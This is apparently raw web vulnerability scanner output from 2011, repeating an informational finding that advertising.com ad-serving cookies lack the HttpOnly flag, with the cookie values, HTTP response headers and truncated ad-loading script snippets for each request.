16893018=_4dfa5390,0313612446,768033^981200^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=22319790/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=Vnk+NFJwHob0Fp6sIWwJoaUjtKPCC0nheJpwEg02FaMBdbdhGTwihXoxEwjmGaMBxGehGTAQvaoxEQW4FaMBLpphGTQghXoxEgN5FaMB6ijhGTAmhXoxEAY4FaMBdDmhGTA/yaoxEAVZGaMBYimhGTA3WaoxEQY4FaMBFGehGTAxBaoxEU1aGaMBbTehGTQwBaoxEYnXGaMBWGohGTgQvaoxEogmGaMBxmphGTQRgaoxE0soGaMB8mphGHZAmZOiGmZj0jw+NX0btiGA8MoBl7a+AcsmGUuAEOpxBbLuBoKuGo/smJwokacwzClALRqxBXaxAMdPGVwrQQwdIakhq62ApVmBwTqHIUbNGAH; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:13 GMT; path=/
F1=BUdS63EBAAAABAAAA8AAICA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:13 GMT; path=/
BASE=x7Q9Yi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3H!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:13 GMT; path=/
ROLL=U6APIjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9K!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:13 GMT; path=/
22319790=_4dfa49d5,4178647168,768033^702208^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.702208.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:22:13 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 16 Jun 2011 18:22:13 GMT
Content-Length: 994
Connection: close
Set-Cookie: C2=Vnk+NFJwHob0Fp6sIWwJoaUjtKPCC0nheJpwEg02FaMBdbdhGTwihXoxEwjmGaMBxGehGTAQvaoxEQW4FaMBLpphGTQghXoxEgN5FaMB6ijhGTAmhXoxEAY4FaMBdDmhGTA/yaoxEAVZGaMBYimhGTA3WaoxEQY4FaMBFGehGTAxBaoxEU1aGaMBbTehGTQwBaoxEYnXGaMBWGohGTgQvaoxEogmGaMBxmphGTQRgaoxE0soGaMB8mphGHZAmZOiGmZj0jw+NX0btiGA8MoBl7a+AcsmGUuAEOpxBbLuBoKuGo/smJwokacwzClALRqxBXaxAMdPGVwrQQwdIakhq62ApVmBwTqHIUbNGAH; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:13 GMT; path=/
Set-Cookie: F1=BUdS63EBAAAABAAAA8AAICA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:13 GMT; path=/
Set-Cookie: BASE=x7Q9Yi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3H!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:13 GMT; path=/
Set-Cookie: ROLL=U6APIjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9K!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:13 GMT; path=/
Set-Cookie: 22319790=_4dfa49d5,4178647168,768033^702208^1183^0,0_; domain=advertising.com; path=/click

document.write('<iframe src="http://view.atdmt.com/NDM/iview/140262768/direct/01/4178647168?click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000702208/cstr=22319790=_4dfa49d5,417864
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=33615280/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=HTl+NFJwHob0Fg6sIWwJoawitKPCC0nRcJpwEg02FRMBdbdRETwihXExEwjmGRMBxGeRETAQvaExEQW4FRMBLppRETQghXExEgN5FRMB6ijRETAmhXExEAY4FRMBdDmRETA/yaExEAVZGRMBYimRETA3WaExEQY4FRMBFGeRETAxBaExEU1aGRMBbTeRETQwBaExEYnXGRMBWGoRETgQvaExEogmGRMBxmpRETQRgaExE0soGRMB8mpREHZAmZOiGdZj0jw+NXQbtiGA8Moxi7a+AcsmGLuAEOph/aLuBoKuGf/smJwoka4vzClALRqh/WaxAMdPGMwrQQwdIaAhq62ApVmxtTqHIUbNG3WtrCQIzasIwOICM/oBvdr0IwKvG9G; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
F1=BcMV63EBAAAABAAAAsBA2BA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
BASE=x7Q9ki23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/PNnXEVdwP!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
ROLL=U6APUjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK7KosVuHG!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
33615280=_4dfa54c7,4721737206,768033^993430^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.993430.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 19:08:55 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 601
Date: Thu, 16 Jun 2011 19:08:55 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=HTl+NFJwHob0Fg6sIWwJoawitKPCC0nRcJpwEg02FRMBdbdRETwihXExEwjmGRMBxGeRETAQvaExEQW4FRMBLppRETQghXExEgN5FRMB6ijRETAmhXExEAY4FRMBdDmRETA/yaExEAVZGRMBYimRETA3WaExEQY4FRMBFGeRETAxBaExEU1aGRMBbTeRETQwBaExEYnXGRMBWGoRETgQvaExEogmGRMBxmpRETQRgaExE0soGRMB8mpREHZAmZOiGdZj0jw+NXQbtiGA8Moxi7a+AcsmGLuAEOph/aLuBoKuGf/smJwoka4vzClALRqh/WaxAMdPGMwrQQwdIaAhq62ApVmxtTqHIUbNG3WtrCQIzasIwOICM/oBvdr0IwKvG9G; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
Set-Cookie: F1=BcMV63EBAAAABAAAAsBA2BA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
Set-Cookie: BASE=x7Q9ki23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/PNnXEVdwP!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
Set-Cookie: ROLL=U6APUjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK7KosVuHG!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
Set-Cookie: 33615280=_4dfa54c7,4721737206,768033^993430^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6046.134363.2043285697521/B5118749.4;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnu
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=43472790/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=dik+NFJwHob0Fq6sIWwJoaYjtKPCC0nxeJpwEg02FbMBdbdxGTwihXsxEwjmGbMBxGexGTAQvasxEQW4FbMBLppxGTQghXsxEgN5FbMB6ijxGTAmhXsxEAY4FbMBdDmxGTA/yasxEAVZGbMBYimxGTA3WasxEQY4FbMBFGexGTAxBasxEU1aGbMBbTexGTQwBasxEYnXGbMBWGoxGTgQvasxEogmGbMBxmpxGTQRgasxE0soGbMB8mpxGHZAmZOiGnZj0jw+NX4btiGA8MoRl7a+AcsmGVuAEOpBCbLuBoKuGp/smJwokagwzClALRqBCXaxAMdPGWwrQQwdIaoh; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
F1=B0JS63EBAAAABAAAA0AAKCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
BASE=x7Q9Wi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrE!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
ROLL=U6APKjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6DkcN!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
43472790=_4dfa489d,2003200856,768033^1004438^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1004438.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:17:01 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 641
Date: Thu, 16 Jun 2011 18:17:01 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=dik+NFJwHob0Fq6sIWwJoaYjtKPCC0nxeJpwEg02FbMBdbdxGTwihXsxEwjmGbMBxGexGTAQvasxEQW4FbMBLppxGTQghXsxEgN5FbMB6ijxGTAmhXsxEAY4FbMBdDmxGTA/yasxEAVZGbMBYimxGTA3WasxEQY4FbMBFGexGTAxBasxEU1aGbMBbTexGTQwBasxEYnXGbMBWGoxGTgQvasxEogmGbMBxmpxGTQRgasxE0soGbMB8mpxGHZAmZOiGnZj0jw+NX4btiGA8MoRl7a+AcsmGVuAEOpBCbLuBoKuGp/smJwokagwzClALRqBCXaxAMdPGWwrQQwdIaoh; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
Set-Cookie: F1=B0JS63EBAAAABAAAA0AAKCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
Set-Cookie: BASE=x7Q9Wi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrE!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
Set-Cookie: ROLL=U6APKjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6DkcN!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
Set-Cookie: 43472790=_4dfa489d,2003200856,768033^1004438^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript1.1" src="http://ebay.adnxs.com/ttj?id=472679&cb=2003200856&pt1=0000768033&pt2=0001004438&pt3=1183&imp_id=v2:I:1308248221:2003200856:0000768033:0001004438:1
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=46970102/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=k/k+NFJwHob0Fk6sIWwJoaAjtKPCC0nRdJpwEg02FVMBdbdRFTwihXUxEwjmGVMBxGeRFTAQvaUxEQW4FVMBLppRFTQghXUxEgN5FVMB6ijRFTAmhXUxEAY4FVMBdDmRFTA/yaUxEAVZGVMBYimRFTA3WaUxEQY4FVMBFGeRFTAxBaUxEU1aGVMBbTeRFTQwBaUxEYnXGVMBWGoRFTgQvaUxEogmGVMBxmpRFTQRgaUxE0soGVMB8mpRFHZAmZOiGhZj0jw+NXgbtiGA8Moxj7a+AcsmGPuAEOphAbLuBoKuGj/smJwokaIwzClALRqhAXaxAMdPGQwrQQwdIaQhq62ApVmxuTqHIUbNG7WtrCQIza8IwOICM/oBwB; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
F1=BQ+T63EBAAAABAAAAQBA+BA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
BASE=x7Q9di23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/N!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
ROLL=U6APNjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMP!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
46970102=_4dfa4fe4,1115861440,768033^1029730^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1029730.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:48:04 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 609
Date: Thu, 16 Jun 2011 18:48:04 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=k/k+NFJwHob0Fk6sIWwJoaAjtKPCC0nRdJpwEg02FVMBdbdRFTwihXUxEwjmGVMBxGeRFTAQvaUxEQW4FVMBLppRFTQghXUxEgN5FVMB6ijRFTAmhXUxEAY4FVMBdDmRFTA/yaUxEAVZGVMBYimRFTA3WaUxEQY4FVMBFGeRFTAxBaUxEU1aGVMBbTeRFTQwBaUxEYnXGVMBWGoRFTgQvaUxEogmGVMBxmpRFTQRgaUxE0soGVMB8mpRFHZAmZOiGhZj0jw+NXgbtiGA8Moxj7a+AcsmGPuAEOphAbLuBoKuGj/smJwokaIwzClALRqhAXaxAMdPGQwrQQwdIaQhq62ApVmxuTqHIUbNG7WtrCQIza8IwOICM/oBwB; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
Set-Cookie: F1=BQ+T63EBAAAABAAAAQBA+BA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
Set-Cookie: BASE=x7Q9di23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/N!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
Set-Cookie: ROLL=U6APNjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMP!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
Set-Cookie: 46970102=_4dfa4fe4,1115861440,768033^1029730^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5865.126262.AOLPERFORMANCENETWO/B5551575.40;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=61218373/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

F1=BMlU63EBAAAABAAAAgBA6BA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:58:27 GMT; path=/
BASE=x7Q9hi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlC!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:58:27 GMT; path=/
ROLL=U6APRjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:58:27 GMT; path=/
61218373=_4dfa5253,2384205386,768033^1022301^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=63221864/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=Cxk+NFJwHob0Fn6sIWwJoaMjtKPCC0nBeJpwEg02FYMBdbdBGTwihXgxEwjmGYMBxGeBGTAQvagxEQW4FYMBLppBGTQghXgxEgN5FYMB6ijBGTAmhXgxEAY4FYMBdDmBGTA/yagxEAVZGYMBYimBGTA3WagxEQY4FYMBFGeBGTAxBagxEU1aGYMBbTeBGTQwBagxEYnXGYMBWGoBGTgQvagxEogmGYMBxmpBGTQRgagxE0soGYMB8mpBGHZAmZOiGkZj0jw+NXsbtiGA8Mohk7a+AcsmGSuAEOpRBbLuBoKuGm/smJwokaUwzClALRqRBXaxAMdPGTwrQQwdIachq62ApVmhvTqHIUbNG+G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
F1=BIET63EBAAAABAAAAEBAECA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
BASE=x7Q9ai23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUykM!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
ROLL=U6APOjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2C!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
63221864=_4dfa4c42,7871412873,768033^1004266^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1004266.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:32:34 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 683
Date: Thu, 16 Jun 2011 18:32:34 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=Cxk+NFJwHob0Fn6sIWwJoaMjtKPCC0nBeJpwEg02FYMBdbdBGTwihXgxEwjmGYMBxGeBGTAQvagxEQW4FYMBLppBGTQghXgxEgN5FYMB6ijBGTAmhXgxEAY4FYMBdDmBGTA/yagxEAVZGYMBYimBGTA3WagxEQY4FYMBFGeBGTAxBagxEU1aGYMBbTeBGTQwBagxEYnXGYMBWGoBGTgQvagxEogmGYMBxmpBGTQRgagxE0soGYMB8mpBGHZAmZOiGkZj0jw+NXsbtiGA8Mohk7a+AcsmGSuAEOpRBbLuBoKuGm/smJwokaUwzClALRqRBXaxAMdPGTwrQQwdIachq62ApVmhvTqHIUbNG+G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
Set-Cookie: F1=BIET63EBAAAABAAAAEBAECA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
Set-Cookie: BASE=x7Q9ai23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUykM!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
Set-Cookie: ROLL=U6APOjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2C!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
Set-Cookie: 63221864=_4dfa4c42,7871412873,768033^1004266^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/314453502/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001004
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=63734715/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=+Xl+NFJwHob0Ff6sIWwJoasitKPCC0nBcJpwEg02FQMBdbdBETwihXAxEwjmGQMBxGeBETAQvaAxEQW4FQMBLppBETQghXAxEgN5FQMB6ijBETAmhXAxEAY4FQMBdDmBETA/yaAxEAVZGQMBYimBETA3WaAxEQY4FQMBFGeBETAxBaAxEU1aGQMBbTeBETQwBaAxEYnXGQMBWGoBETgQvaAxEogmGQMBxmpBETQRgaAxE0soGQMB8mpBEHZAmZOiGcZj0jw+NXMbtiGA8Mohi7a+AcsmGKuAEOpR/aLuBoKuGe/smJwoka0vzClALRqR/WaxAMdPGLwrQQwdIa8gq62ApVmhtTqHIUbNG2WtrCQIzaoIwOICM/oxudr0IwKvG8Gt5jwMvaAc; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:06 GMT; path=/
F1=B4fV63EBAAAABAAAAwBA0BA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:06 GMT; path=/
BASE=x7Q9li23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/PNnXEVdwPGnvMOKDL!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:06 GMT; path=/
